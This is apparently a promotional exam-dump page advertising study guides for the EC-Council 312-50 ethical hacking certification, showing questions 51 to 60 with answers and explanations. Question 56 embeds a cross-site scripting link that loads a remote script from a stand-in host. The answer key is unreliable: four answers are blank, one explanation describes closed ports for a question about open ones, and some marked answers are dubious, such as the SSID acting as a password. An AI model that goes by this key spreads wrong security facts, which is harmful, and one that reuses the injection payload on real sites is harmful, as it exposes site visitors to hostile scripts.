Top Leading 312-50 free question Reviews!

All that matters here is passing the EC-Council 312-50 exam, and all that you need is a high score on the 312-50 Ethical Hacking and Countermeasures (CEHv6) exam. The only thing you need to do is download the Pass4sure 312-50 exam study guides now. We will not let you down with our money-back guarantee.



Q51. Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit. 

Choose the attack type from the choices given below. 

A. Database Fingerprinting 

B. Database Enumeration 

C. SQL Fingerprinting 

D. SQL Enumeration 

Answer: A

Explanation: He is trying to create a view of the characteristics of the target database; he is taking its fingerprints.


Q52. What is the proper response for an X-MAS scan if the port is open?

A. SYN 

B. ACK 

C. FIN 

D. PSH 

E. RST 

F. No response 

Answer:

Explanation: Closed ports respond to an X-MAS scan by ignoring the packet.


Q53. How does a denial-of-service attack work? 

A. A hacker tries to decipher a password by using a system, which subsequently crashes the network 

B. A hacker attempts to imitate a legitimate user by confusing a computer or even another person 

C. A hacker prevents a legitimate user (or group of users) from accessing a service 

D. A hacker uses every character, word, or letter he or she can think of to defeat authentication 

Answer: C

Explanation: In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the Internet proper use policy as indicated by the Internet Architecture Board (IAB). 


Q54. Which of the following is true of the wireless Service Set ID (SSID)? (Select all that apply.) 

A. Identifies the wireless network 

B. Acts as a password for network access 

C. Should be left at the factory default setting 

D. Not broadcasting the SSID defeats NetStumbler and other wireless discovery tools 

Answer: AB


Q55. SSL has been seen as the solution to a lot of common security problems. Administrators often make use of SSL to encrypt communications from Point A to Point B. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between Point A and Point B?

A. SSL is redundant if you already have IDS’s in place 

B. SSL will trigger rules at regular intervals and force the administrator to turn them off

C. SSL will mask the content of the packet, and the Intrusion Detection System is blinded

D. SSL will slow down the IDS while it is breaking the encryption to see the packet content 

Answer:

Explanation: An IDS will not be able to evaluate the content in the packets if it is encrypted. 


Q56. This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data. 

<a href="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E">See foobar</a>

What is this attack? 

A. Cross-site-scripting attack 

B. SQL Injection 

C. URL Traversal attack 

D. Buffer Overflow attack 

Answer: A


Q57. What is a NULL scan? 

A. A scan in which all flags are turned off 

B. A scan in which certain flags are off 

C. A scan in which all flags are on 

D. A scan in which the packet size is set to zero 

E. A scan with an illegal packet size

Answer:

Explanation: A null scan has all flags turned off. 


Q58. Dan is conducting a penetration test and has found a vulnerability in a web application which gave him the sessionID token via a cross-site scripting vulnerability. Dan wants to replay this token. However, the session ID manager (on the server) checks the originating IP address as well. Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might not be able to get an interactive session?

A. Dan cannot spoof his IP address over a TCP network

B. The server will send replies back to the spoofed IP address 

C. Dan can establish an interactive session only if he uses a NAT 

D. The scenario is incorrect as Dan can spoof his IP and get responses 

Answer:

Explanation: Spoofing your IP address is only effective when there is no need to establish a two-way connection, as all traffic meant to go to the attacker will end up at the place of the spoofed address.


Q59. How do you defend against ARP spoofing? 

A. Place static ARP entries on servers, workstations and routers

B. Tune IDS sensors to look for large amounts of ARP traffic on local subnets

C. Use private VLANs

D. Use ARPWALL system and block ARP spoofing attacks 

Answer: ABC 

Explanation: ARPWALL is an open-source tool that gives early warning when an ARP attack occurs.

This tool is still under construction. 


Q60. A rootkit is a collection of tools (programs) that enable administrator-level access to a computer. This program hides itself deep in an operating system for malicious activity and is extremely difficult to detect. The malicious software operates in a stealth fashion by hiding its files, processes and registry keys, and may be used to create a hidden directory or folder designed to stay out of view of a user's operating system and security software.

What privilege level does a rootkit require to successfully infect a victim's machine?

A. User level privileges 

B. Ring 3 Privileges 

C. System level privileges 

D. Kernel level privileges 

Answer: D